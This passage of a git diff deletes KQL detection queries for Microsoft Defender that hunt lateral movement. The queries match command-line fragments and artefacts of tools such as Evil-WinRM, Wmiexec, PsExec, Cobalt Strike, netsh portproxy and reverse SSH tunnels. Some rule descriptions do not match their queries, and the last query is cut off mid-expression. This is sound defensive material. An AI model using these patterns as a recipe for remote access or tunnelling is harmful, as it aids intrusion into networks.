-// Level: high
-// Description: Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.
-
-// Tags: attack.lateral_movement, attack.t1021.002
-DeviceProcessEvents
-| where (FolderPath endswith "\\SharpMove.exe" or ProcessVersionInfoOriginalFileName =~ "SharpMove.exe") or ((ProcessCommandLine contains "action=create" or ProcessCommandLine contains "action=dcom" or ProcessCommandLine contains "action=executevbs" or ProcessCommandLine contains "action=hijackdcom" or ProcessCommandLine contains "action=modschtask" or ProcessCommandLine contains "action=modsvc" or ProcessCommandLine contains "action=query" or ProcessCommandLine contains "action=scm" or ProcessCommandLine contains "action=startservice" or ProcessCommandLine contains "action=taskscheduler") and ProcessCommandLine contains "computername=")
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_WinRM_Access_Via_Evil-WinRM.kql b/Lateral Movement/HackTool_-_WinRM_Access_Via_Evil-WinRM.kql
deleted file mode 100644
index 7a831987..00000000
--- a/Lateral Movement/HackTool_-_WinRM_Access_Via_Evil-WinRM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/07
-// Level: medium
-// Description: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
-// Tags: attack.lateral_movement, attack.t1021.006
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-i " and ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ") and FolderPath endswith "\\ruby.exe"
\ No newline at end of file
diff --git a/Lateral Movement/HackTool_-_Wmiexec_Default_Powershell_Command.kql b/Lateral Movement/HackTool_-_Wmiexec_Default_Powershell_Command.kql
deleted file mode 100644
index 68ddb59a..00000000
--- a/Lateral Movement/HackTool_-_Wmiexec_Default_Powershell_Command.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/08
-// Level: high
-// Description: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script
-// Tags: attack.defense_evasion, attack.lateral_movement
-DeviceProcessEvents
-| where ProcessCommandLine contains "-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc"
\ No newline at end of file
diff --git a/Lateral Movement/MMC_Spawning_Windows_Shell.kql b/Lateral Movement/MMC_Spawning_Windows_Shell.kql
deleted file mode 100644
index e74f2325..00000000
--- a/Lateral Movement/MMC_Spawning_Windows_Shell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Karneades, Swisscom CSIRT
-// Date: 2019/08/05
-// Level: high
-// Description: Detects a Windows command line executable started from MMC
-// Tags: attack.lateral_movement, attack.t1021.003
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\mmc.exe" and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe") or FolderPath contains "\\BITSADMIN")
\ No newline at end of file
diff --git a/Lateral Movement/Mstsc.EXE_Execution_From_Uncommon_Parent.kql b/Lateral Movement/Mstsc.EXE_Execution_From_Uncommon_Parent.kql
deleted file mode 100644
index 9d8271d6..00000000
--- a/Lateral Movement/Mstsc.EXE_Execution_From_Uncommon_Parent.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/18
-// Level: high
-// Description: Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
-// Tags: attack.lateral_movement
-DeviceProcessEvents
-| where (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe") and (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chrome.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe")
\ No newline at end of file
diff --git a/Lateral Movement/New_PortProxy_Registry_Entry_Added.kql b/Lateral Movement/New_PortProxy_Registry_Entry_Added.kql
deleted file mode 100644
index edd848c1..00000000
--- a/Lateral Movement/New_PortProxy_Registry_Entry_Added.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/06/22
-// Level: medium
-// Description: Detects the modification of the PortProxy registry key which is used for port forwarding.
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceRegistryEvents
-| where RegistryKey contains "\\Services\\PortProxy\\v4tov4\\tcp"
\ No newline at end of file
diff --git a/Lateral Movement/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql b/Lateral Movement/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
deleted file mode 100644
index bde86a78..00000000
--- a/Lateral Movement/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel
-// Date: 2019/01/29
-// Level: medium
-// Description: Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceProcessEvents
-| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "interface" and ProcessCommandLine contains "portproxy" and ProcessCommandLine contains "add" and ProcessCommandLine contains "v4tov4") or (ProcessCommandLine contains "i " and ProcessCommandLine contains "p " and ProcessCommandLine contains "a " and ProcessCommandLine contains "v ") or (ProcessCommandLine contains "connectp" and ProcessCommandLine contains "listena" and ProcessCommandLine contains "c="))
\ No newline at end of file
diff --git a/Lateral Movement/New_Remote_Desktop_Connection_Initiated_Via_Mstsc.EXE.kql b/Lateral Movement/New_Remote_Desktop_Connection_Initiated_Via_Mstsc.EXE.kql
deleted file mode 100644
index 24c6c93b..00000000
--- a/Lateral Movement/New_Remote_Desktop_Connection_Initiated_Via_Mstsc.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/01/07
-// Level: medium
-// Description: Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server.
-Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
-
-// Tags: attack.lateral_movement, attack.t1021.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /v:" and (FolderPath endswith "\\mstsc.exe" or ProcessVersionInfoOriginalFileName =~ "mstsc.exe")) and (not((ProcessCommandLine contains "C:\\ProgramData\\Microsoft\\WSL\\wslg.rdp" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lxss\\wslhost.exe")))
\ No newline at end of file
diff --git a/Lateral Movement/Outbound_RDP_Connections_Over_Non-Standard_Tools.kql b/Lateral Movement/Outbound_RDP_Connections_Over_Non-Standard_Tools.kql
deleted file mode 100644
index bec2a777..00000000
--- a/Lateral Movement/Outbound_RDP_Connections_Over_Non-Standard_Tools.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Markus Neis
-// Date: 2019/05/15
-// Level: high
-// Description: Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement.
-An initial baseline is required before using this utility to exclude third party RDP tooling that you might use.
-
-// Tags: attack.lateral_movement, attack.t1021.001, car.2013-07-002
-DeviceNetworkEvents
-| where RemotePort == 3389 and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\mstsc.exe", "C:\\Windows\\SysWOW64\\mstsc.exe")))) and (not(((InitiatingProcessFolderPath endswith "\\Avast Software\\Avast\\AvastSvc.exe" or InitiatingProcessFolderPath endswith "\\Avast\\AvastSvc.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\dns.exe" and Protocol =~ "udp" and LocalPort == 53) or InitiatingProcessFolderPath =~ "" or InitiatingProcessFolderPath =~ "C:\\Program Files\\Mozilla Firefox\\firefox.exe" or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\Ranger\\SentinelRanger.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" or InitiatingProcessFolderPath endswith "\\RDCMan.exe" or (InitiatingProcessFolderPath endswith "\\FSAssessment.exe" or InitiatingProcessFolderPath endswith "\\FSDiscovery.exe" or InitiatingProcessFolderPath endswith "\\MobaRTE.exe" or InitiatingProcessFolderPath endswith "\\mRemote.exe" or InitiatingProcessFolderPath endswith "\\mRemoteNG.exe" or InitiatingProcessFolderPath endswith "\\Passwordstate.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManager64.exe" or InitiatingProcessFolderPath endswith "\\RemoteDesktopManagerFree.exe" or InitiatingProcessFolderPath endswith "\\RSSensor.exe" or InitiatingProcessFolderPath endswith "\\RTS2App.exe" or
InitiatingProcessFolderPath endswith "\\RTSApp.exe" or InitiatingProcessFolderPath endswith "\\spiceworks-finder.exe" or InitiatingProcessFolderPath endswith "\\Terminals.exe" or InitiatingProcessFolderPath endswith "\\ws_TunnelService.exe") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\TSplus\\Java\\bin\\HTML5service.exe", "C:\\Program Files (x86)\\TSplus\\Java\\bin\\HTML5service.exe")) or InitiatingProcessFolderPath =~ "")))
\ No newline at end of file
diff --git a/Lateral Movement/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql b/Lateral Movement/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql
deleted file mode 100644
index 09b3d975..00000000
--- a/Lateral Movement/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/01
-// Level: medium
-// Description: Detect use of PDQ Deploy remote admin tool
-// Tags: attack.execution, attack.lateral_movement, attack.t1072
-DeviceProcessEvents
-| where ProcessVersionInfoFileDescription =~ "PDQ Deploy Console" or ProcessVersionInfoProductName =~ "PDQ Deploy" or ProcessVersionInfoCompanyName =~ "PDQ.com" or ProcessVersionInfoOriginalFileName =~ "PDQDeployConsole.exe"
\ No newline at end of file
diff --git a/Lateral Movement/PSEXEC_Remote_Execution_File_Artefact.kql b/Lateral Movement/PSEXEC_Remote_Execution_File_Artefact.kql
deleted file mode 100644
index 67f96f11..00000000
--- a/Lateral Movement/PSEXEC_Remote_Execution_File_Artefact.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/21
-// Level: high
-// Description: Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.execution, attack.persistence, attack.t1136.002, attack.t1543.003, attack.t1570, attack.s0029
-DeviceFileEvents
-| where FolderPath endswith ".key" and FolderPath startswith "C:\\Windows\\PSEXEC-"
\ No newline at end of file
diff --git a/Lateral Movement/PUA_-_Radmin_Viewer_Utility_Execution.kql b/Lateral Movement/PUA_-_Radmin_Viewer_Utility_Execution.kql
deleted file mode 100644
index 9edcca22..00000000
--- a/Lateral Movement/PUA_-_Radmin_Viewer_Utility_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/22
-// Level: medium
-// Description: Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines
-// Tags: attack.execution, attack.lateral_movement, attack.t1072
-DeviceProcessEvents
-| where ProcessVersionInfoFileDescription =~ "Radmin Viewer" or ProcessVersionInfoProductName =~ "Radmin Viewer" or ProcessVersionInfoOriginalFileName =~ "Radmin.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Password_Provided_In_Command_Line_Of_Net.EXE.kql b/Lateral Movement/Password_Provided_In_Command_Line_Of_Net.EXE.kql
deleted file mode 100644
index 5662813f..00000000
--- a/Lateral Movement/Password_Provided_In_Command_Line_Of_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton (HAWK.IO)
-// Date: 2021/12/09
-// Level: medium
-// Description: Detects a when net.exe is called with a password in the command line
-// Tags: attack.defense_evasion, attack.initial_access, attack.persistence, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1078
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " use " and (ProcessCommandLine contains ":" and ProcessCommandLine contains "\\") and (ProcessCommandLine contains "/USER:" and ProcessCommandLine contains " ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine endswith " "))
\ No newline at end of file
diff --git a/Lateral Movement/Port_Forwarding_Activity_Via_SSH.EXE.kql b/Lateral Movement/Port_Forwarding_Activity_Via_SSH.EXE.kql
deleted file mode 100644
index 986261d9..00000000
--- a/Lateral Movement/Port_Forwarding_Activity_Via_SSH.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/12
-// Level: medium
-// Description: Detects port forwarding activity via SSH.exe
-// Tags: attack.command_and_control, attack.lateral_movement, attack.t1572, attack.t1021.001, attack.t1021.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -R " or ProcessCommandLine contains " /R ") and FolderPath endswith "\\ssh.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_CobaltStrike_Service_Installations_-_Registry.kql b/Lateral Movement/Potential_CobaltStrike_Service_Installations_-_Registry.kql
deleted file mode 100644
index e448ad48..00000000
--- a/Lateral Movement/Potential_CobaltStrike_Service_Installations_-_Registry.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Wojciech Lesicki
-// Date: 2021/06/29
-// Level: high
-// Description: Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.
-
-// Tags: attack.execution, attack.privilege_escalation, attack.lateral_movement, attack.t1021.002, attack.t1543.003, attack.t1569.002
-DeviceRegistryEvents
-| where ((RegistryValueData contains "ADMIN$" and RegistryValueData contains ".exe") or (RegistryValueData contains "%COMSPEC%" and RegistryValueData contains "start" and RegistryValueData contains "powershell")) and (RegistryKey contains "\\System\\CurrentControlSet\\Services" or (RegistryKey contains "\\System\\ControlSet" and RegistryKey contains "\\Services"))
\ No newline at end of file
diff --git a/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack.kql b/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack.kql
deleted file mode 100644
index ce7ee51b..00000000
--- a/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
-// Date: 2020/10/12
-// Level: critical
-// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
-// Tags: attack.lateral_movement, attack.t1021.002, attack.t1021.003
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\Internet Explorer\\iertutil.dll"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack_-_Image_Load.kql b/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack_-_Image_Load.kql
deleted file mode 100644
index 0f172583..00000000
--- a/Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack_-_Image_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
-// Date: 2020/10/12
-// Level: critical
-// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
-// Tags: attack.lateral_movement, attack.t1021.002, attack.t1021.003
-DeviceImageLoadEvents
-| where FolderPath endswith "\\Internet Explorer\\iertutil.dll" and InitiatingProcessFolderPath endswith "\\Internet Explorer\\iexplore.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_Excel.EXE_DCOM_Lateral_Movement_Via_ActivateMicrosoftApp.kql b/Lateral Movement/Potential_Excel.EXE_DCOM_Lateral_Movement_Via_ActivateMicrosoftApp.kql
deleted file mode 100644
index 5103ee52..00000000
--- a/Lateral Movement/Potential_Excel.EXE_DCOM_Lateral_Movement_Via_ActivateMicrosoftApp.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Aaron Stratton
-// Date: 2023/11/13
-// Level: high
-// Description: Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.
-
-// Tags: attack.t1021.003, attack.lateral_movement
-DeviceProcessEvents
-| where ((ProcessVersionInfoOriginalFileName in~ ("foxprow.exe", "schdplus.exe", "winproj.exe")) or (FolderPath endswith "\\foxprow.exe" or FolderPath endswith "\\schdplus.exe" or FolderPath endswith "\\winproj.exe")) and InitiatingProcessFolderPath endswith "\\excel.exe"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_MSTSC_Shadowing_Activity.kql b/Lateral Movement/Potential_MSTSC_Shadowing_Activity.kql
deleted file mode 100644
index b4c31b54..00000000
--- a/Lateral Movement/Potential_MSTSC_Shadowing_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020/01/24
-// Level: high
-// Description: Detects RDP session hijacking by using MSTSC shadowing
-// Tags: attack.lateral_movement, attack.t1563.002
-DeviceProcessEvents
-| where ProcessCommandLine contains "noconsentprompt" and ProcessCommandLine contains "shadow:"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql b/Lateral Movement/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql
deleted file mode 100644
index ff92bcaa..00000000
--- a/Lateral Movement/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tom Ueltschi (@c_APT_ure)
-// Date: 2019/01/12
-// Level: medium
-// Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
-// Tags: attack.t1037.001, attack.persistence, attack.lateral_movement
-DeviceRegistryEvents
-| where ActionType =~ "RegistryKeyCreated" and RegistryKey contains "UserInitMprLogonScript"
\ No newline at end of file
diff --git a/Lateral Movement/Potential_Remote_Desktop_Tunneling.kql b/Lateral Movement/Potential_Remote_Desktop_Tunneling.kql
deleted file mode 100644
index dd48e1e7..00000000
--- a/Lateral Movement/Potential_Remote_Desktop_Tunneling.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/27
-// Level: medium
-// Description: Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination.
-// Tags: attack.lateral_movement, attack.t1021
-DeviceProcessEvents
-| where ProcessCommandLine contains ":3389" and (ProcessCommandLine contains " -L " or ProcessCommandLine contains " -P " or ProcessCommandLine contains " -R " or ProcessCommandLine contains " -pw " or ProcessCommandLine contains " -ssh ")
\ No newline at end of file
diff --git a/Lateral Movement/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql b/Lateral Movement/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql
deleted file mode 100644
index 6cbd83b0..00000000
--- a/Lateral Movement/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport
-// Date: 2022/02/12
-// Level: high
-// Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
-// Tags: attack.defense_evasion, attack.lateral_movement, attack.t1021.001, attack.t1112
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "WinStations\\RDP-Tcp" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "fDenyTSConnections"))
\ No newline at end of file
diff --git a/Lateral Movement/Privilege_Escalation_via_Named_Pipe_Impersonation.kql b/Lateral Movement/Privilege_Escalation_via_Named_Pipe_Impersonation.kql
deleted file mode 100644
index a8265a7e..00000000
--- a/Lateral Movement/Privilege_Escalation_via_Named_Pipe_Impersonation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/27
-// Level: high
-// Description: Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.
-// Tags: attack.lateral_movement, attack.t1021
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo" and ProcessCommandLine contains ">" and ProcessCommandLine contains "\\\\.\\pipe\\") and ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE")))
\ No newline at end of file
diff --git a/Lateral Movement/RDP_Over_Reverse_SSH_Tunnel.kql b/Lateral Movement/RDP_Over_Reverse_SSH_Tunnel.kql
deleted file mode 100644
index 9f1c5485..00000000
--- a/Lateral Movement/RDP_Over_Reverse_SSH_Tunnel.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Samir Bousseaden
-// Date: 2019/02/16
-// Level: high
-// Description: Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
-// Tags: attack.command_and_control, attack.t1572, attack.lateral_movement, attack.t1021.001, car.2013-07-002
-DeviceNetworkEvents
-| where (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "::1/128")) and (InitiatingProcessFolderPath endswith "\\svchost.exe" and LocalPort == 3389)
\ No newline at end of file
diff --git a/Lateral Movement/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql b/Lateral Movement/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
deleted file mode 100644
index 85c02aac..00000000
--- a/Lateral Movement/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community
-// Date: 2019/01/29
-// Level: high
-// Description: Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
-// Tags: attack.lateral_movement, attack.defense_evasion, attack.command_and_control, attack.t1090
-DeviceProcessEvents
-| where (ProcessCommandLine contains " i" and ProcessCommandLine contains " p" and ProcessCommandLine contains "=3389" and ProcessCommandLine contains " c") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Lateral Movement/Rundll32_Execution_Without_Parameters.kql b/Lateral Movement/Rundll32_Execution_Without_Parameters.kql
deleted file mode 100644
index 6fb33be4..00000000
--- a/Lateral Movement/Rundll32_Execution_Without_Parameters.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bartlomiej Czyz, Relativity
-// Date: 2021/01/31
-// Level: high
-// Description: Detects rundll32 execution without parameters as observed when running Metasploit windows/smb/psexec exploit module
-// Tags: attack.lateral_movement, attack.t1021.002, attack.t1570, attack.execution, attack.t1569.002
-DeviceProcessEvents
-| where ProcessCommandLine in~ ("rundll32.exe", "rundll32")
\ No newline at end of file
diff --git a/Lateral Movement/Suspicious_Plink_Port_Forwarding.kql b/Lateral Movement/Suspicious_Plink_Port_Forwarding.kql
deleted file mode 100644
index 05e8ca0b..00000000
--- a/Lateral Movement/Suspicious_Plink_Port_Forwarding.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/01/19
-// Level: high
-// Description: Detects suspicious Plink tunnel port forwarding to a local port
-// Tags: attack.command_and_control, attack.t1572, attack.lateral_movement, attack.t1021.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " -R " and ProcessVersionInfoFileDescription =~ "Command-line SSH, Telnet, and Rlogin client"
\ No newline at end of file
diff --git a/Lateral Movement/Suspicious_RDP_Redirect_Using_TSCON.kql b/Lateral Movement/Suspicious_RDP_Redirect_Using_TSCON.kql
deleted file mode 100644
index 781539c1..00000000
--- a/Lateral Movement/Suspicious_RDP_Redirect_Using_TSCON.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/03/17
-// Level: high
-// Description: Detects a suspicious RDP session redirect using tscon.exe
-// Tags: attack.lateral_movement, attack.t1563.002, attack.t1021.001, car.2013-07-002
-DeviceProcessEvents
-| where ProcessCommandLine contains " /dest:rdp-tcp#"
\ No newline at end of file
diff --git a/Lateral Movement/Suspicious_SysAidServer_Child.kql b/Lateral Movement/Suspicious_SysAidServer_Child.kql
deleted file mode 100644
index e0e0d33e..00000000
--- a/Lateral Movement/Suspicious_SysAidServer_Child.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/26
-// Level: medium
-// Description: Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)
-// Tags: attack.lateral_movement, attack.t1210
-DeviceProcessEvents
-| where InitiatingProcessCommandLine contains "SysAidServer" and (InitiatingProcessFolderPath endswith "\\java.exe" or InitiatingProcessFolderPath endswith "\\javaw.exe")
\ No newline at end of file
diff --git a/Lateral Movement/Suspicious_UltraVNC_Execution.kql b/Lateral Movement/Suspicious_UltraVNC_Execution.kql
deleted file mode 100644
index e5a222c2..00000000
--- a/Lateral Movement/Suspicious_UltraVNC_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Bhabesh Raj
-// Date: 2022/03/04
-// Level: high
-// Description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)
-// Tags: attack.lateral_movement, attack.g0047, attack.t1021.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "-autoreconnect " and ProcessCommandLine contains "-connect " and ProcessCommandLine contains "-id:"
\ No newline at end of file
diff --git a/Lateral Movement/Suspicious_WSMAN_Provider_Image_Loads.kql b/Lateral Movement/Suspicious_WSMAN_Provider_Image_Loads.kql
deleted file mode 100644
index 11e20190..00000000
--- a/Lateral Movement/Suspicious_WSMAN_Provider_Image_Loads.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/06/24
-// Level: medium
-// Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
-// Tags: attack.execution, attack.t1059.001, attack.lateral_movement, attack.t1021.003
-DeviceImageLoadEvents
-| where (((FolderPath endswith "\\WsmSvc.dll" or FolderPath endswith "\\WsmAuto.dll" or FolderPath endswith "\\Microsoft.WSMan.Management.ni.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("WsmSvc.dll", "WSMANAUTOMATION.DLL", "Microsoft.WSMan.Management.dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and InitiatingProcessVersionInfoOriginalFileName =~ "WsmWmiPl.dll")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\Citrix\\" or (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\services.exe") or (InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\v")) or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs -p -s BITS" or InitiatingProcessCommandLine contains "svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc" or InitiatingProcessCommandLine contains "svchost.exe -k NetworkService -p -s Wecsvc" or InitiatingProcessCommandLine contains "svchost.exe -k netsvcs") or 